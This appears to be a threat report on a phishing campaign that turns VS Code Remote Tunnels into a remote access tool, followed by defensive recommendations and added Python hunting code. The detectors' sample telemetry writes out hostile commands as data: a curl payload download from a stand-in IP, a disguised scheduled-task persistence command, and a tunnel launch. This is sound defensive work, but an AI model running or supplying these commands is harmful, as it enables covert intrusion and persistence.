Stealthy Cyberattack Converts Visual Studio Code into a Remote Access Tool

A recent investigation has uncovered a cyberattack that turns Visual Studio Code (VS Code), specifically its Remote Tunnels feature, into a remote access tool that gives attackers control of victim systems. The attack relies on legitimately signed software and outbound-only connections to Microsoft infrastructure, which is what lets it slip past common detection methods while executing malicious actions.

Attack Overview

The attack starts with a .LNK (Windows shortcut) file disguised as a legitimate installer, typically delivered through phishing emails. When opened, the shortcut displays a fake success message in Chinese (“安裝成功”, “installation successful”) to convince the user that an installer ran. In the background it uses curl, which ships with current Windows releases so no extra tooling is needed, to silently download a portable Python distribution along with the malicious components.

The downloaded Python script, named update.py, is obfuscated to hinder analysis and signature-based detection. At the time of the investigation it had zero detections on VirusTotal. A zero score only means that no engine had a signature yet; it is not evidence that the file is benign, and it is exactly the window in which behaviour-based controls have to carry the load.

Stages of the Attack:

Initial Execution:

  • Phishing Email: The attack begins with phishing emails containing a .LNK file that masquerades as a legitimate installer.
  • Fake Installation: The .LNK file shows a fake success message, misleading users while malicious activities continue in the background.

Downloading and Running Malicious Components:

  • Python Script (update.py): The .LNK file uses curl to download a portable Python distribution together with the update.py script, so the malware does not depend on an interpreter already being present on the host.
  • Obfuscation: The script is obfuscated and had no detections on VirusTotal at the time of the investigation, so hash- and signature-based tools let it through.

Exploitation of Visual Studio Code:

  • VS Code Check: The script checks whether VS Code is installed. If it is not, it downloads the standalone VS Code Command Line Interface (CLI) from a legitimate Microsoft source, so the binary it relies on is genuinely signed and passes file-reputation checks.
  • Scheduled Task Creation: The script registers a scheduled task named “MicrosoftHealthcareMonitorNode” that re-runs it on a schedule, giving it persistence across reboots; the name imitates a Microsoft component so that it blends in with legitimate tasks.

Misuse of VSCode Remote Features:

  • VS Code Remote Tunnels: VS Code’s Remote Tunnels feature lets a developer expose a machine through Microsoft’s tunnel relay service and reach it from another VS Code instance (through the “Remote – Tunnels” extension or vscode.dev). The victim side needs only the standalone CLI: the script runs `code tunnel`, which registers the machine with the relay and turns it into a gateway into the victim’s environment.
  • Stealthy Remote Access: The tunnel is an outbound HTTPS connection to Microsoft-owned infrastructure, so no inbound port is opened and no SSH or RDP listener appears on the host. The traffic looks like ordinary developer activity and every binary involved is legitimately signed, which is why conventional controls miss the intrusion.

Authentication and System Control:

  • Activation Code Extraction: On first run, `code tunnel` prints a GitHub device-login URL and a one-time code. The script captures that code from the CLI’s redirected output file so it can be handed to the attackers, because the code is what ties the tunnel to an identity.
  • Association with a GitHub Account: The attackers enter the code at GitHub’s device login page while signed in to their own account. The victim’s machine is then registered under the attackers’ GitHub identity and appears in their list of remote machines, giving them a terminal, file system access and code execution on it from their own VS Code.

Data Exfiltration:

  • Data Collection: With the tunnel in place, the attackers enumerate the host: directory listings of Program Files and user profile folders, the running process list, and basic system details.
  • Transmission to C&C Server: The collected data, including location, the user’s privilege level and the system language settings, is Base64-encoded and transmitted to the attackers’ command-and-control (C&C) server. Base64 is encoding, not encryption; it only hides the content from casual inspection, and a proxy that decodes request bodies sees it in the clear.

Further Malicious Activities:

  • Command Execution: Attackers can execute commands, manipulate files, and install additional malware.
  • Password Extraction: Tools like Mimikatz and LaZagne are used to extract passwords, further expanding the attackers’ control over the compromised system.
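The stages above leave a distinctive parent/child process chain on the endpoint: a shell spawned from the shortcut, curl writing to a user-writable directory, Python running from that directory, then schtasks and `code.exe tunnel` as children of Python. The following detection logic is an added example and not code from the original report. It runs over constructed Sysmon-style process-creation events; the task name and the `tunnel` verb come from the report, while every path, address, PID and timestamp is made up.

```python
"""Detect the .LNK -> curl -> python -> schtasks / code.exe tunnel chain in
process-creation telemetry.

Added example, not code from the original report. Events are constructed
Sysmon-style records (event ID 1 fields renamed: pid, ppid, image, cmd); the
task name and the 'tunnel' verb come from the report, every path, address and
timestamp is made up.
"""
import json
import re
from collections import defaultdict

# Constructed telemetry, one JSON object per line.
SAMPLE_EVENTS = r"""
{"ts":"2024-09-27T08:01:02Z","pid":4100,"ppid":900,"image":"C:\\Windows\\explorer.exe","cmd":"explorer.exe"}
{"ts":"2024-09-27T08:01:05Z","pid":4120,"ppid":4100,"image":"C:\\Windows\\System32\\cmd.exe","cmd":"cmd.exe /c curl.exe -o C:\\Users\\u\\AppData\\Local\\Temp\\py.zip https://203.0.113.5/py.zip"}
{"ts":"2024-09-27T08:01:06Z","pid":4130,"ppid":4120,"image":"C:\\Windows\\System32\\curl.exe","cmd":"curl.exe -o C:\\Users\\u\\AppData\\Local\\Temp\\py.zip https://203.0.113.5/py.zip"}
{"ts":"2024-09-27T08:01:20Z","pid":4140,"ppid":4120,"image":"C:\\Users\\u\\AppData\\Local\\Temp\\python\\python.exe","cmd":"python.exe C:\\Users\\u\\AppData\\Local\\Temp\\update.py"}
{"ts":"2024-09-27T08:01:22Z","pid":4150,"ppid":4140,"image":"C:\\Windows\\System32\\schtasks.exe","cmd":"schtasks.exe /create /tn MicrosoftHealthcareMonitorNode /tr \"C:\\Users\\u\\AppData\\Local\\Temp\\python\\python.exe C:\\Users\\u\\AppData\\Local\\Temp\\update.py\" /sc minute /mo 4 /f"}
{"ts":"2024-09-27T08:01:25Z","pid":4160,"ppid":4140,"image":"C:\\Users\\u\\AppData\\Local\\Temp\\code.exe","cmd":"code.exe tunnel --accept-server-license-terms"}
{"ts":"2024-09-27T09:30:00Z","pid":5200,"ppid":4100,"image":"C:\\Program Files\\Microsoft VS Code\\Code.exe","cmd":"\"C:\\Program Files\\Microsoft VS Code\\Code.exe\" C:\\repo"}
"""

USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|ProgramData|Public)\\", re.I)
KNOWN_TASK = "MicrosoftHealthcareMonitorNode"  # task name reported in the investigation
CHAIN_TAGS = {"known_task_name", "task_runs_user_dir_binary", "python_from_user_dir"}


def load_events(text):
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def classify(ev):
    """Indicator tags for a single event; an empty list means nothing of note."""
    tags = []
    image, cmd = ev["image"], ev["cmd"]
    exe = image.rsplit("\\", 1)[-1].lower()
    if exe == "curl.exe" and USER_WRITABLE.search(cmd):
        tags.append("curl_download_to_user_dir")
    if exe in ("python.exe", "pythonw.exe") and USER_WRITABLE.search(image):
        tags.append("python_from_user_dir")
    if exe == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        m = re.search(r'/tn\s+"?([^\s"]+)', cmd, re.I)
        if m and m.group(1).lower() == KNOWN_TASK.lower():
            tags.append("known_task_name")
        if USER_WRITABLE.search(cmd):
            tags.append("task_runs_user_dir_binary")
    # The tunnel verb alone is not malicious; where the CLI lives and what spawned it is.
    if exe in ("code.exe", "code-tunnel.exe") and re.search(r"(^|\s)tunnel(\s|$)", cmd, re.I):
        tags.append("vscode_tunnel_started")
        if USER_WRITABLE.search(image):
            tags.append("vscode_cli_from_user_dir")
    return tags


def correlate(events):
    """Roll indicators up to the root of each process tree so the chain fires,
    not isolated events (a lone 'code tunnel' on a developer box is normal)."""
    by_pid = {e["pid"]: e for e in events}

    def root(pid):
        seen = set()
        while pid in by_pid and by_pid[pid]["ppid"] in by_pid and pid not in seen:
            seen.add(pid)
            pid = by_pid[pid]["ppid"]
        return pid

    trees = defaultdict(set)
    for e in events:
        for tag in classify(e):
            trees[root(e["pid"])].add(tag)
    alerts = {}
    for r, tags in trees.items():
        if "vscode_tunnel_started" in tags and tags & CHAIN_TAGS:
            alerts[r] = ("high", sorted(tags))
        elif tags:
            alerts[r] = ("low", sorted(tags))
    return alerts


if __name__ == "__main__":
    for pid, (severity, tags) in correlate(load_events(SAMPLE_EVENTS)).items():
        print(f"root pid {pid}: {severity}: {', '.join(tags)}")
```

The benign VS Code launch from Program Files in the sample produces no tags, and a developer legitimately running `code tunnel` would produce only a low-severity tunnel tag; the high-severity alert requires the tunnel to share a process tree with the persistence or user-directory interpreter indicators. In production the same logic should key on Sysmon's ProcessGuid rather than raw PIDs, which are reused.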

Connection to Stately Taurus APT Group

The tactics and tooling used in this attack overlap with those attributed to the Chinese advanced persistent threat (APT) group tracked as Stately Taurus (also known as Mustang Panda). The investigation noted similarities, not a confirmed link: overlapping tradecraft is not attribution, and the operators may simply be borrowing techniques from established espionage groups.

Recommendations for Users and Organizations:

  1. Treat .LNK Attachments as Executables: Be cautious of email attachments, especially .LNK files, and block or quarantine shortcut files at the mail gateway; a .LNK can launch cmd.exe, curl and a script without showing a window.
  2. Keep Security Tools Updated: Ensure antivirus and endpoint protection are updated with the latest threat intelligence, but do not rely on file reputation alone; a clean VirusTotal score is not a clean bill, so behavioural detections on process chains and scheduled task creation matter more than hashes here.
  3. Audit VS Code and the VS Code CLI: Inventory where code.exe and code-tunnel.exe exist on endpoints, flag copies outside the normal install location, and hunt for processes or scheduled tasks that run `code tunnel`. Regularly review installed VS Code extensions as well, especially remote-access ones, for unauthorized configurations.
  4. Restrict Tunnels Where Not Needed: If Remote Tunnels are not a sanctioned workflow, block the tunnel relay domains at the proxy and prevent execution of the VS Code CLI through application control. Disabling the “Remote – Tunnels” extension on client machines does not stop a victim host from being exposed, because the victim side only needs the CLI.
  5. Monitor Endpoints and the Network: Alert on new scheduled tasks whose action runs an interpreter or code.exe from a user-writable directory, and on hosts outside the developer population connecting to the tunnel service.
  6. Educate Users: Train employees to recognize phishing attempts and understand the risks associated with unsolicited files.
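Two hunts that follow from the recommendations on scheduled tasks and network monitoring, as an added example that is not part of the original report. The scheduled-task CSV is a constructed subset of the columns that `schtasks /query /v /fo CSV` produces, the DNS log lines are made up, the tunnel domain suffixes are taken from Microsoft's published network requirements for Remote Tunnels (verify them against current documentation before deploying), and the allowlist of hosts approved to run tunnels is an assumption.

```python
"""Persistence inventory and tunnel-client hunt for the VS Code tunnel RAT.

Added example, not code from the original report. SAMPLE_SCHTASKS_CSV is a
constructed subset of `schtasks /query /v /fo CSV` columns, SAMPLE_DNS_LOG is
made up, TUNNEL_SUFFIXES are assumed from Microsoft's published Remote Tunnels
network requirements, and APPROVED_TUNNEL_HOSTS is a hypothetical allowlist.
"""
import csv
import io
import re

KNOWN_TASK = "MicrosoftHealthcareMonitorNode"  # task name reported in the investigation
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|ProgramData|Public)\\", re.I)
INTERPRETERS = re.compile(r"\b(python|pythonw|powershell|pwsh|wscript|cscript|mshta)\.exe\b", re.I)
TUNNEL_SUFFIXES = (".tunnels.api.visualstudio.com", ".devtunnels.ms")  # assumed relay domains
APPROVED_TUNNEL_HOSTS = {"dev-ws-01"}  # hypothetical: hosts allowed to run 'code tunnel'

# Constructed schtasks output. The OneDrive task lives under AppData too, which is
# why the rule keys on interpreter-plus-user-path rather than user-path alone.
SAMPLE_SCHTASKS_CSV = '''"HostName","TaskName","Task To Run","Run As User"
"WS-17","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","%windir%\\system32\\defrag.exe -c -h -o -$","SYSTEM"
"WS-17","\\MicrosoftHealthcareMonitorNode","C:\\Users\\u\\AppData\\Local\\Temp\\python\\python.exe C:\\Users\\u\\AppData\\Local\\Temp\\update.py","u"
"WS-17","\\KeepTunnel","C:\\Users\\u\\AppData\\Local\\Temp\\code.exe tunnel --accept-server-license-terms","u"
"WS-17","\\OneDrive Standalone Update Task","C:\\Users\\u\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe","u"
'''

# Constructed DNS query log: timestamp, client host, query name, record type.
SAMPLE_DNS_LOG = """2024-09-27T08:01:30Z WS-17 global.rel.tunnels.api.visualstudio.com A
2024-09-27T08:02:10Z dev-ws-01 euw.rel.tunnels.api.visualstudio.com A
2024-09-27T08:03:00Z WS-17 update.microsoft.com A
2024-09-27T08:04:00Z WS-22 abc123.euw.devtunnels.ms A
"""


def suspicious_tasks(csv_text):
    """Return (task name, reason) for tasks that match the persistence pattern."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        name = row["TaskName"].lstrip("\\")
        action = row["Task To Run"]
        if name.lower() == KNOWN_TASK.lower():
            hits.append((name, "known task name from the report"))
        elif re.search(r"\bcode(-tunnel)?\.exe\b.*\btunnel\b", action, re.I):
            hits.append((name, "task starts a VS Code tunnel"))
        elif INTERPRETERS.search(action) and USER_WRITABLE.search(action):
            hits.append((name, "interpreter runs a script from a user-writable path"))
    return hits


def unapproved_tunnel_clients(log_text):
    """Hosts outside the allowlist that resolve the tunnel relay domains."""
    offenders = set()
    for line in log_text.strip().splitlines():
        _ts, host, qname, _qtype = line.split()
        if qname.lower().endswith(TUNNEL_SUFFIXES) and host not in APPROVED_TUNNEL_HOSTS:
            offenders.add(host)
    return offenders


if __name__ == "__main__":
    for name, reason in suspicious_tasks(SAMPLE_SCHTASKS_CSV):
        print(f"task {name}: {reason}")
    print("unapproved tunnel clients:", sorted(unapproved_tunnel_clients(SAMPLE_DNS_LOG)))
```

The DNS check will not see the GitHub device-login step, because github.com is reachable from almost every network and the account involved belongs to the attackers; the relay domains are the network indicator that is specific to tunnels. Note that the task name in the report is one sample's choice and will change, so the interpreter and `code tunnel` rules are the ones to keep.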

Conclusion

The recent attack involving Visual Studio Code being used as a remote access tool highlights the importance of vigilance even when dealing with trusted software. Organizations should adopt proactive security measures, focusing on endpoint protection, user education, and network monitoring to defend against sophisticated cyber threats.
